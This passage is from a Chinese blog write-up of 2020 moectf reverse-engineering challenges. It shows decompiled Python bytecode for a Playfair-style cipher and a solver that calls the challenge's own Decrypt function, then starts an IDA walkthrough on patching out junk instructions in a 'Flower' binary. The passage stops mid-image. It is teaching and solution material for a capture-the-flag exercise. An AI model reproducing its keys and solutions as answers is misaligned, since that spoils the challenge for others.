'</span>to <span class="number">440</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 93 46 LOAD_CONST True</span></span><br><span class="line"><span class="string"> 48 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 50 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 52 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 54 LOAD_METHOD isalpha</span></span><br><span class="line"><span class="string"> 56 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 58 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 60_62 POP_JUMP_IF_FALSE 418 '</span>to <span class="number">418</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 94 64 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 66 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 68 BINARY_ADD </span></span><br><span class="line"><span class="string"> 70 STORE_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 95 72 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 74 LOAD_GLOBAL len</span></span><br><span class="line"><span class="string"> 76 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 78 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 80 COMPARE_OP <</span></span><br><span class="line"><span class="string"> 82_84 POP_JUMP_IF_FALSE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 96 86 LOAD_CONST True</span></span><br><span class="line"><span class="string"> 88 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 90 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 92 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 94 LOAD_METHOD isalpha</span></span><br><span class="line"><span class="string"> 96 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 98 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 100_102 POP_JUMP_IF_FALSE 396 '</span>to <span class="number">396</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 97 104 LOAD_STR '</span>I<span class="string">'</span></span><br><span class="line"><span class="string"> 106 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 108 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 110 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 112 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 114 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 116 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 118 POP_JUMP_IF_FALSE 130 '</span>to <span class="number">130</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 98 120 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 122 LOAD_STR '</span>J<span class="string">'</span></span><br><span class="line"><span class="string"> 124 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 126 STORE_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 128 JUMP_FORWARD 146 '</span>to <span class="number">146</span><span class="string">'</span></span><br><span class="line"><span class="string"> 130_0 COME_FROM 118 '</span><span class="number">118</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 100 130 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 101 132 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 134 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 136 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 138 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 140 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 100 142 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 144 STORE_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 146_0 COME_FROM 128 '</span><span class="number">128</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 102 146 LOAD_STR '</span>I<span class="string">'</span></span><br><span class="line"><span class="string"> 148 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 150 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 152 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 154 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 156 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 158 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 160 POP_JUMP_IF_FALSE 172 '</span>to <span class="number">172</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 103 162 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 164 LOAD_STR '</span>J<span class="string">'</span></span><br><span class="line"><span class="string"> 166 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 168 STORE_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 170 JUMP_FORWARD 188 '</span>to <span class="number">188</span><span class="string">'</span></span><br><span class="line"><span class="string"> 172_0 COME_FROM 160 '</span><span class="number">160</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 105 172 LOAD_GLOBAL Get_MatrixIndex</span></span><br><span class="line"><span class="string"> 174 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 176 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 178 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 180 LOAD_METHOD upper</span></span><br><span class="line"><span class="string"> 182 CALL_METHOD_0 0 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 184 CALL_FUNCTION_1 1 '</span><span class="string">'</span></span><br><span class="line"><span class="string"> 186 STORE_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 188_0 COME_FROM 170 '</span><span class="number">170</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 107 188 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 190 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 192 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 194 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 196 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 198 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 200 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 202_204 POP_JUMP_IF_FALSE 268 '</span>to <span class="number">268</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 108 206 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 208 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 210 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 212 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 214 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 216 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 218 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 220 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 222 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 224 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 226 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 109 228 LOAD_CONST 5</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 108 230 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 232 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 109 234 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 236 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 238 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 240 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 242 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 244 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 246 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 248 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 250 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 252 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"> 254 LOAD_CONST 5</span></span><br><span class="line"><span class="string"> 256 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 258 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 108 260 BINARY_ADD </span></span><br><span class="line"><span class="string"> 262 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 264 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 266 JUMP_ABSOLUTE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 268_0 COME_FROM 202 '</span><span class="number">202</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 110 268 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 270 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 272 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 274 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 276 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 278 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 280 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 282_284 POP_JUMP_IF_FALSE 348 '</span>to <span class="number">348</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 286 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 288 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 290 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 292 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 294 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 296 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 298 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 112 300 LOAD_CONST 5</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 302 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 304 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 112 306 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 308 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 310 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 312 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 112 314 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 316 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 318 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 320 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 322 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 324 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"> 326 LOAD_CONST 5</span></span><br><span class="line"><span class="string"> 328 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 330 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 332 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 334 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 336 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 338 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 340 BINARY_ADD </span></span><br><span class="line"><span class="string"> 342 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 344 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 346 JUMP_ABSOLUTE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 348_0 COME_FROM 282 '</span><span class="number">282</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 114 348 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 350 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 352 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 354 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 356 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 358 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 360 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 362 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 364 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 366 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 368 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 370 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 372 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 374 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 376 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 378 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 380 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 382 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 384 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 386 BINARY_ADD </span></span><br><span class="line"><span class="string"> 388 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 390 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 115 392_394 BREAK_LOOP 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 396_0 COME_FROM 100 '</span><span class="number">100</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 116 396 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 398 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 400 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 402 STORE_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 404 JUMP_BACK 72 '</span>to <span class="number">72</span><span class="string">'</span></span><br><span class="line"><span class="string"> 406_0 COME_FROM 82 '</span><span class="number">82</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 117 406 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 408 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 410 BINARY_ADD </span></span><br><span class="line"><span class="string"> 412 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 118 414 JUMP_BACK 32 '</span>to <span class="number">32</span><span class="string">'</span></span><br><span class="line"><span class="string"> 416 JUMP_FORWARD 430 '</span>to <span class="number">430</span><span class="string">'</span></span><br><span class="line"><span class="string"> 418_0 COME_FROM 60 '</span><span class="number">60</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 120 418 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 420 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 422 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 424 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 426 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 428 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 430_0 COME_FROM 416 '</span><span class="number">416</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 121 430 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 432 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 434 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 436 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 438 JUMP_BACK 32 '</span>to <span class="number">32</span><span class="string">'</span></span><br><span class="line"><span class="string"> 440_0 COME_FROM 42 '</span><span class="number">42</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 123 440 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 442 RETURN_VALUE </span></span><br><span class="line"><span class="string"> -1 RETURN_LAST </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Parse error at or near `JUMP_FORWARD'</span> instruction at offset <span class="number">416</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> key = <span class="string">'YWCNOPJAFGHDTULMQXZEBRVKS'</span></span><br><span class="line"> flag_enc = <span class="string">'WYTFSQOYGYOQKJLHUE'</span></span><br><span class="line"> Create_Matrix(key)</span><br><span class="line"> print(<span class="string">'Please Input flag: '</span>)</span><br><span class="line"> plaintext = <span class="built_in">input</span>()</span><br><span class="line"> <span class="keyword">if</span> plaintext[<span class="number">0</span>:<span class="number">7</span>] != <span class="string">'moectf{'</span> <span class="keyword">or</span> plaintext[(-<span class="number">1</span>)] != <span class="string">'}'</span>:</span><br><span class="line"> print(<span class="string">'Ruaaaaa~Wrong!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> plaintext = plaintext[<span class="number">7</span>:-<span class="number">1</span>]</span><br><span class="line"> flag = Encrypt(plaintext, T_letter)</span><br><span class="line"> <span class="keyword">if</span> flag != flag_enc:</span><br><span class="line"> print(<span class="string">'Ruaaaaa~Wrong!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">'Congratulations!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>看着这“夹生”的代码,我内心反复着<code>mmp~~~</code>但是突然有个点:两个没有完全解析的函数<code>Encrypt、Decrypt</code>……等下!!!<code>Decrypt</code>函数给出来了?那我们拿着解密函数不用不是对不起它么:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> puzzle</span><br><span class="line"></span><br><span class="line">key = <span class="string">'YWCNOPJAFGHDTULMQXZEBRVKS'</span></span><br><span class="line">cipher = <span class="string">'WYTFSQOYGYOQKJLHUE'</span></span><br><span class="line"></span><br><span class="line">puzzle.Create_Matrix(key)</span><br><span class="line">print(puzzle.T_letter)</span><br><span class="line">print(puzzle.Decrypt(cipher,puzzle.T_letter))</span><br></pre></td></tr></table></figure><p>en???这么简单???就是这么简单……想不到吧<code>~~~</code>啦啦啦啦啦啦<code>~~~</code></p><h3 id="Flower"><a href="#Flower" class="headerlink" title="Flower"></a>Flower</h3><p>这个题讲真好难!!!这里先感谢一下<code>void</code>大神对我的指导,<code>void</code>永远是我大哥!!!</p><p>好了,下来开始正题:</p><p><img src="/images/2020moectf-Reverse/image-20201030225634506.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030225634506.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030225634506"></p><p>根据题目名称<code>flower</code>,盲猜本题考查花指令,拖进<code>IDA</code>分析,扣符号表死马……<code>F12</code>查看字符串,这里有一个小点,就是我们要让我们的<a href="https://www.jianshu.com/p/b3169f9f5427">IDA显示中文字符</a>。根据字符串定位<code>main</code>函数:</p><p><img src="/images/2020moectf-Reverse/image-20201030230348401.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030230348401.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030230348401"></p><p><code>F5</code>大法,然后稍微改一改变量名(这样子,能舒服一些……找到对数据处理的函数:</p><p><img src="/images/2020moectf-Reverse/image-20201030230904256.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030230904256.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030230904256"></p><p>经过这一部分处理后的结果和<code>byte_4032AC</code>进行比较:<img src="/images/2020moectf-Reverse/image-20201031000410037.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000410037.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031000410037"></p><p>跟进<code>off_4032A4</code>:<img src="/images/2020moectf-Reverse/image-20201030231003639.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030231003639.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030231003639"></p><p>分别跟进两个函数,发现<code>loc_401310</code>存在花指令:<img src="/images/2020moectf-Reverse/image-20201030231616691.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030231616691.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030231616691"></p><p>我们手动<code>patch</code>一下,把<code>40133B</code>修改成<code>nop</code>:点在<code>40133B</code>,按<code>U</code>,切换到<code>hex-view</code>,<code>F2</code>修改<code>74</code>为<code>90</code>,<code>F2</code>保存,切换回<code>IDA view</code>,按<code>C</code>,点击<code>401310</code>,按<code>P</code>:<img src="/images/2020moectf-Reverse/image-20201030232022281.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030232022281.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030232022281"></p><p><img src="/images/2020moectf-Reverse/image-20201030232115839.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030232115839.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201030232115839"></p><p>这个函数等效于:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> input[i] = <span class="number">16</span> * (inpout[result] ^ <span class="number">0x16</span>) | ((inpout[result] ^ <span class="number">0x16</span>) >> <span class="number">4</span>);</span><br></pre></td></tr></table></figure><p>然后我们跟进<code>sub_4011B0</code>:</p><p><img src="/images/2020moectf-Reverse/image-20201031000853428.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000853428.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031000853428"></p><p>然后查看<code>off_404018</code>:<img src="/images/2020moectf-Reverse/image-20201031000930019.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000930019.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031000930019"></p><p>跟进<code>loc_4012B0</code>,发现花指令,和之前的那个一样,按照上面说的处理:<img src="/images/2020moectf-Reverse/image-20201031001257387.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001257387.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031001257387"></p><p>跟进<code>loc_401240</code>,也是花指令,处理掉:<img src="/images/2020moectf-Reverse/image-20201031001450275.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001450275.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031001450275"></p><p>跟进<code>loc_401270</code>,还是花指令,处理掉:<img src="/images/2020moectf-Reverse/image-20201031001650795.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001650795.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" 